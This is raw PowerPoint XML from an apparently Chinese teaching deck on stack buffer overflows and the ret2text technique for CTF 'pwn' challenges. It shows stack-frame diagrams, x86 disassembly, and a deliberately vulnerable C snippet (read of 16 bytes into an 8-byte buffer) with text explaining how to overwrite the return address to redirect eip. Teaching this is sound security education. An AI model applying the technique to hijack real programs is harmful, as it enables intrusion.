              <a:rPr lang="en" sz="1333" kern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1c:   6a 01           push   $0x1</a:t>
            </a:r>
            <a:endParaRPr sz="1333" kern="0"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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333" kern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1e:   e8 fc ff ff ff  call   1f &lt;callee&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1333" kern="0"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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333" kern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23:   83 c4 0c        add    $0xc,%esp</a:t>
            </a:r>
            <a:endParaRPr sz="1333" kern="0"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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333" kern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26:   89 45 fc        mov    %eax,-0x4(%ebp)</a:t>
            </a:r>
            <a:endParaRPr sz="1333" kern="0"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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333" kern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29:   83 45 fc 04     addl   $0x4,-0x4(%ebp)</a:t>
            </a:r>
            <a:endParaRPr sz="1333" kern="0"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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333" kern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2d:   8b 45 fc        mov    -0x4(%ebp),%eax</a:t>
            </a:r>
            <a:endParaRPr sz="1333" kern="0"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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333" kern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30:   c9              </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1333" kern="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leave</a:t>
            </a:r>
            <a:endParaRPr sz="1333" kern="0" dirty="0"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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333" kern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31:   c3              </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1333" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>ret</a:t>
            </a:r>
            <a:endParaRPr sz="1333" b="1" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="666666"/>
              </a:highlight>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="565" name="Shape 565"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="1980133"/>
            <a:ext cx="2704800" cy="4096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%ebp in caller's caller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66" name="Shape 566"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="2389733"/>
            <a:ext cx="2704800" cy="4096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666666"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>unused dword</a:t>
            </a:r>
            <a:endParaRPr sz="1867" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="666666"/>
              </a:highlight>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="567" name="Shape 567"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="2799333"/>
            <a:ext cx="2704800" cy="4096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666666"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>unused dword</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="666666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68" name="Shape 568"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="3208933"/>
            <a:ext cx="2704800" cy="4096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666666"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>unused dword</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="666666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69" name="Shape 569"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="3618533"/>
            <a:ext cx="2704800" cy="4096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666666"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>unused dword</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="666666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70" name="Shape 570"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="4028133"/>
            <a:ext cx="2704800" cy="4096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666666"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>unused dword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71" name="Shape 571"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="4437733"/>
            <a:ext cx="2704800" cy="4096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666666"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>unused dword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72" name="Shape 572"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="4847333"/>
            <a:ext cx="2704800" cy="4096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666666"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>unused dword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73" name="Shape 573"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="5256933"/>
            <a:ext cx="2704800" cy="4096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666666"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>unused dword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74" name="Shape 574"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="5666533"/>
            <a:ext cx="2704800" cy="4096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666666"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>unused dword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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="575" name="Shape 575"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5798417" y="1416541"/>
            <a:ext cx="2147980" cy="365600"/>
            <a:chOff x="3286490" y="1640558"/>
            <a:chExt cx="1610985" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="576" name="Shape 576"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3286490" y="1640558"/>
              <a:ext cx="1126200" cy="27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r" defTabSz="1219170">
                <a:buClr>
                  <a:srgbClr val="000000"/>
                </a:buClr>
              </a:pPr>
              <a:r>
                <a:rPr lang="en" sz="1333" b="1" kern="0">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:highlight>
                    <a:srgbClr val="666666"/>
                  </a:highlight>
                  <a:latin typeface="Consolas"/>
                  <a:ea typeface="Consolas"/>
                  <a:cs typeface="Consolas"/>
                  <a:sym typeface="Consolas"/>
                </a:rPr>
                <a:t>%esp</a:t>
              </a:r>
              <a:endParaRPr sz="1333" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight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cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="577" name="Shape 577"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000" flipH="1">
              <a:off x="4412675" y="1770756"/>
              <a:ext cx="484800" cy="6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sp>
        <p:nvSpPr>
          <p:cNvPr id="578" name="Shape 578"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="1570533"/>
            <a:ext cx="2704800" cy="4096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ret addr (caller's caller)</a:t>
            </a:r>
            <a:endParaRPr sz="1867" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="666666"/>
              </a:highlight>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial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A35292D8-3CE1-45B7-96A3-6577ECBD739D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1068000" y="823118"/>
            <a:ext cx="46394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函数调用栈的工作方式（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cdecl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09065A2A-A88A-46B6-A251-128E1A8BD73C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="10886"/>
            <a:ext cx="56388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栈溢出基础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| C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语言函数调用栈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1D896494-AAE6-44DA-9D7C-E5B3B4201BBB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="588135" y="1540331"/>
            <a:ext cx="6096000" cy="4801314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1A1A1A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介绍完背景知识，就可以继续回归栈溢出攻击的主题了。当函数正在执行内部指令的过程中我们无法拿到程序的控制权，只有在发生函数调用或者结束函数调用时，程序的控制权会在函数状态之间发生跳转，这时才可以通过修改函数状态来实现攻击。而控制程序执行指令最关键的寄存器就是 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A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eip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A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，所以我们的目标就是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF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让 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF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eip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF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zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF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载入攻击指令的地址</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A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。</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A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</a:br>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A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1A1A1A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先来看看函数调用结束时，如果要让 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A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eip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A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zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A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指向攻击指令，需要哪些准备？首先，在退栈过程中，返回地址会被传给 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A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eip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A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，所以我们只需要</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF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让溢出数据用攻击指令的地址来覆盖返回地址</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A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就可以了。其次，我们可以在溢出数据内包含一段攻击指令，也可以在内存其他位置寻找可用的攻击指令。</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A"/>
                </a:solidFill>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:latin typeface="-apple-system"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
            </a:b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7831AC0-1B47-4D33-BC42-9E8780D373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5016" y="1337623"/>
            <a:ext cx="4648849" cy="4363059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CA8779BD-8090-4AD4-813C-AFEB35FB4A34}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="10886"/>
            <a:ext cx="56388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栈溢出基础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| ret2text</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21725873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BD0C481B-D494-47C5-8F71-186891DAC39B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2848997" y="2708299"/>
            <a:ext cx="6469487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C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栈溢出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（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Stack overflow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）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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最常见、漏洞比例最高、危害最大的二进制漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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在 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CTF PWN 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中往往是漏洞利用的基础</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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堆溢出（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Heap overflow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）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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堆管理器复杂，利用花样繁多</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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CTF PWN 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中的常见题型</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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Data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段溢出</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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攻击效果依赖于 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Data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段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上存放了何种控制数据</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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B38616A-CA48-491F-8D7F-2091DCF2F185}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2201331" y="1520186"/>
            <a:ext cx="46004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缓冲区溢出（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Buffer overflow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0C52FDD-EB67-4B53-B15A-93780AD31B2E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2201331" y="2160409"/>
            <a:ext cx="845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本质是向</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C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定长的缓冲区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中写入了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C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超长的数据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，造成超出的数据覆写了合法内存区域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F4C1899-CC07-4BE6-B38E-A4E92CB71A6B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="10886"/>
            <a:ext cx="56388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栈溢出基础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| ret2text</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="335592753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Shape 646">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{52C8EFC1-AADF-4D52-A09B-1EAE6F2088A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2465957" y="2177046"/>
            <a:ext cx="3181980" cy="1342106"/>
            <a:chOff x="1797175" y="2320925"/>
            <a:chExt cx="2537400" cy="1161971"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="30" name="Shape 648">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B8C155EB-71F4-4F63-9BC3-879B2F186BD8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1797175" y="2320925"/>
              <a:ext cx="2537400" cy="2742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/>
                <a:t>return address</a:t>
              </a:r>
              <a:endParaRPr dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="31" name="Shape 620">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B4C9F3D-FBDA-4376-97B2-D7EFD3888AB8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1797175" y="2595125"/>
              <a:ext cx="2537400" cy="274200"/>
            </a:xfrm>
            <a:prstGeom prst="rect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/>
                <a:t>stack frame pointer</a:t>
              </a:r>
              <a:endParaRPr dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="33" name="Shape 650">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{020559D6-C4E0-4B01-848E-38DCC0CB1A20}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1797175" y="2865875"/>
              <a:ext cx="2537400" cy="489297"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="F4CCC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/>
                <a:t>local variables</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t>:</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
                <a:t>buf</a:t>
              </a:r>
              <a:endParaRPr dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="34" name="Shape 651">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D328E740-EA37-48D4-B4D5-24459C945E81}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1797175" y="3355172"/>
              <a:ext cx="2537400" cy="127724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" name="文本框 41">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F43A3F6-30C7-4FC4-97CD-0062A1EBF90D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5309234" y="1420600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栈溢出</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45" name="Shape 129">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B6075B8-B87E-4086-B36F-B820E5E68CE6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096000" y="2177046"/>
            <a:ext cx="3181981" cy="1342106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int </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="12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overflow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="12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  <a:endParaRPr sz="12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2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char </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="12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buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="12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[8];        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="12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Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="12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read(0, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="12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buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="12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, 16);</a:t>
            </a:r>
            <a:endParaRPr sz="12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  <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="46" name="Shape 646">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A8620865-4103-47E3-BF99-162ACC0B60D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2465956" y="4227843"/>
            <a:ext cx="3181983" cy="1342106"/>
            <a:chOff x="1797173" y="2320925"/>
            <a:chExt cx="2537402" cy="1161971"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="47" name="Shape 648">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8058C4A4-18F0-4891-A6CA-2E09369A3DC6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1797175" y="2320925"/>
              <a:ext cx="2537400" cy="2742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/>
                <a:t>DDDD</a:t>
              </a:r>
              <a:endParaRPr dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="48" name="Shape 620">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C4227550-B0E5-49E9-88E2-0CC328226EB9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1797175" y="2595125"/>
              <a:ext cx="2537400" cy="274200"/>
            </a:xfrm>
            <a:prstGeom prst="rect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/>
                <a:t>CCCC</a:t>
              </a:r>
              <a:endParaRPr dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="49" name="Shape 650">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{35C00044-7DE2-424C-B616-C475C0722513}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1797173" y="2865875"/>
              <a:ext cx="2537402" cy="236270"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="F4CCC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/>
                <a:t>BBBB</a:t>
              </a:r>
              <a:endParaRPr dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="50" name="Shape 651">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E1C2579-6FA2-4DCF-A024-F08B3C64ED4A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1797175" y="3355172"/>
              <a:ext cx="2537400" cy="127724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" name="Shape 129">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00FD534D-3ACD-44EC-B154-D8AB63ACC254}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096000" y="4227843"/>
            <a:ext cx="3181981" cy="1342106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int </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="12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overflow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="12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  <a:endParaRPr sz="12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2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char </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="12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buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="12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[8];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent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read(0, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="12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buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="12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, 16);   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="12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Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:endParaRPr sz="12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  <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="52" name="直接箭头连接符 51">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BB4F9DDA-2062-41E2-B29A-352B00F54906}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="34" idx="2"/>
            <a:endCxn id="47" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4056947" y="3519152"/>
            <a:ext cx="0" cy="7086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文本框 53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
